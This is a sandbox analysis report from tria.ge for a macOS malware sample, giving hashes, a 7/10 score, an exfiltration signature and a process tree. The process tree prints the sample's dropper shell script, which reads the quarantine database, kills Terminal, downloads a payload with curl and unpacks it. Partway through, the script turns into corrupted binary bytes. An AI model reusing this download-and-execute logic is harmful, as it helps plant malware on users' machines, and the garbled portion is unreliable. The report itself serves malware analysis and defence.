Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    0s
  • max time network
    105s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241101-en
  • resource tags

    arch:amd64arch:i386image:macos-20241101-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    17/02/2025, 18:06

General

  • Target

    Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a

  • Size

    34KB

  • MD5

    e5c50dcecc0d91a37a7fdb4d05206678

  • SHA1

    afc4e2271b2e6dc131fd9731769834d2ccacb149

  • SHA256

    0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a

  • SHA512

    d490555365ac53060416cbc3b64fb38eae0f6f16339c55fc2b2a1c332b672e0b45d911701c6c1d24b908fb39ea843da87e2df4e5ea8a81557bde0cc281504681

  • SSDEEP

    384:CMCyAH1ICtuL//Hk/eUlpEf0cotU2HguYZ5tvr+Q8qr3vFrh6rHskrNab8eri:DObtm3k/HipotXAuYZfp8uv75mab8z

Score
7/10

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a\""
    1⤵
      PID:493
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a\""
      1⤵
        PID:493
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
        1⤵
          PID:493
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
            2⤵
              PID:494
            • /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
              /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
              2⤵
                PID:494
            • /bin/sh
              sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]���#������>�i�PȆ�����'�: Mb��Y�]��Hy����%�� `:{�����I������j�|���������V�R������2�G�M�og�y�˞Cr|���㜇��%j�}�D>��yp�A˚�j@���3+�h-�?���9|SGIV�/Od�k�Zp �����埈�����u3-�Wc=��o݄in�\\��*\$I��:�^FOh1�r+����}�jy}�%{4:_}� ���&:C�� �gF`�ݗ�~Br[�(�d��l5��g�S]�-�^���dq� �IQr@����>�*�.�E0�^�Sy��g;�\\����>��a�#R����hz? ;>��ոS�󘞽���C�Ǖ�\\}\":S��dq�C �n���/�%k<� XĹ(�����o��A�;�n!�&���H5KMr�'�#�s<a�(E��\"�E��l�Ա�#iu�(J�I�����R���@�~�v�r��EԸ�…����'�Gauaz��3}���:i�<���HjG3\\��0�؜M_� GK�����\\���p�"
              1⤵
                PID:495
              • /bin/bash
                sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]���#������>�i�PȆ�����'�: Mb��Y�]��Hy����%�� `:{�����I������j�|���������V�R������2�G�M�og�y�˞Cr|���㜇��%j�}�D>��yp�A˚�j@���3+�h-�?���9|SGIV�/Od�k�Zp �����埈�����u3-�Wc=��o݄in�\\��*\$I��:�^FOh1�r+����}�jy}�%{4:_}� ���&:C�� �gF`�ݗ�~Br[�(�d��l5��g�S]�-�^���dq� �IQr@����>�*�.�E0�^�Sy��g;�\\����>��a�#R����hz? ;>��ոS�󘞽���C�Ǖ�\\}\":S��dq�C �n���/�%k<� XĹ(�����o��A�;�n!�&���H5KMr�'�#�s<a�(E��\"�E��l�Ա�#iu�(J�I�����R���@�~�v�r��EԸ�…����'�Gauaz��3}���:i�<���HjG3\\��0�؜M_� GK�����\\���p�"
                1⤵
                  PID:495

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads